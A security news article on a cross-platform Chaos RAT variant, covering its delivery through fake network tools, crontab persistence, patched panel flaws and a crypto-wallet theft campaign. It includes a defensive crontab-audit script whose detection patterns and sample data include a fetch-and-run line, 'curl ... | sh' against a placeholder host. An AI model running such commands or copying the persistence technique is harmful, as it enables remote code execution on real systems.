- A new version of Chaos RAT Malware is targeting both Windows and Linux systems.
- The malware is spread through fake network tools and phishing emails, often disguised as Linux troubleshooting utilities.
- Chaos RAT gives attackers remote access, file management, and control over infected devices.
- Recent campaigns show connections with cryptocurrency mining activities and theft of wallet credentials.
- Security flaws in the malware’s admin panel have been fixed as of May 2024.
A recent wave of cyber attacks is deploying an updated variant of the malware known as Chaos RAT, impacting both Windows and Linux operating systems. Researchers have found that attackers use deceptive network utility downloads and phishing emails to distribute the malware, particularly targeting Linux users.
Experts from Acronis revealed that Chaos RAT is an open-source remote access tool written in Go, supporting cross-platform deployment. Attackers often trick victims into downloading files disguised as helpful network tools, which in reality install the malware. Once on a system, Chaos RAT connects to an external server, enabling functions like launching remote command shells, managing files, collecting system information, and even shutting down or restarting machines. The latest observed version is 5.0.3, released May 31, 2024.
The Acronis research team stated, “Chaos RAT provides an administrative panel where users can build payloads, establish sessions, and control compromised machines.” They reported that Chaos RAT is used in cryptocurrency mining campaigns, with attacks distributing the malware through phishing links or attachments, and achieving persistence by modifying scheduled task files (such as “/etc/crontab” in Linux). The initial campaigns delivered both Chaos RAT and a separate cryptocurrency miner, showing that Chaos RAT was also used for gathering information about devices.
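A defender can review the persistence location mentioned above by auditing system crontab entries. The following is an added example, not code from Acronis or the Chaos RAT project: it parses the "/etc/crontab" format and flags jobs matching a few heuristics. The heuristics and the sample lines are assumptions constructed for illustration, not published Chaos RAT indicators.

```python
import re

# Heuristics are illustrative assumptions, not indicators published for Chaos RAT.
SUSPICIOUS = {
    "runs from a world-writable directory": re.compile(r"(?:^|[\s;&|])(/tmp|/var/tmp|/dev/shm)/"),
    "downloads and executes": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "decodes an inline payload": re.compile(r"\bbase64\s+(-d|--decode)\b"),
}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")  # e.g. SHELL=/bin/sh

def parse_system_crontab(text):
    """Yield (lineno, schedule, user, command) for each job in /etc/crontab format."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        # "@reboot"-style shorthand uses one schedule field, otherwise five.
        n_sched = 1 if line.startswith("@") else 5
        parts = line.split(None, n_sched + 1)
        if len(parts) < n_sched + 2:
            continue  # malformed: user or command field missing
        yield lineno, " ".join(parts[:n_sched]), parts[n_sched], parts[n_sched + 1]

def audit_crontab(text):
    """Return one finding per job whose command matches any heuristic."""
    findings = []
    for lineno, schedule, user, command in parse_system_crontab(text):
        reasons = [why for why, rx in SUSPICIOUS.items() if rx.search(command)]
        if reasons:
            findings.append({"line": lineno, "user": user, "schedule": schedule,
                             "command": command, "reasons": reasons})
    return findings

# Constructed sample: two stock-style entries plus two suspicious ones.
SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 * * * * root /tmp/.netcheck/update.sh >/dev/null 2>&1
@reboot root curl -fsSL http://updates.example.invalid/a.sh | sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE):
        print(f"line {f['line']}: {f['user']} runs {f['command']!r}: {', '.join(f['reasons'])}")
```

On a live host, pass the contents of "/etc/crontab" to `audit_crontab` and compare findings against a known-good baseline of the file.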
A sample uploaded to VirusTotal in January 2025 from India, titled “NetworkAnalyzer.tar.gz”, suggests attackers are disguising the malware as Linux troubleshooting tools to fool users. The management panel of Chaos RAT previously contained a high-severity vulnerability (CVE-2024-30850) that allowed command injection, as well as a cross-site scripting flaw (CVE-2024-31839). Both issues have now been fixed by the tool’s maintainer.
Researchers highlight that malicious actors use open-source malware like Chaos RAT because it can be quickly customized and makes it harder to determine who is behind attacks. They note that “using publicly available malware helps APT groups blend into the noise of everyday cybercrime,” complicating attribution attempts.
There is also evidence of ongoing campaigns attacking Trust Wallet users on desktop with fake wallets. These attacks are designed to collect browser credentials, extract data from crypto wallets, execute remote commands, and act as clipboard hijackers to steal sensitive information such as seed phrases and private keys. Details about this campaign were shared by Point Wild researcher Kedar S Pandit in a new report, noting the malware can monitor files, clipboard activity, and browser sessions to capture crypto asset details.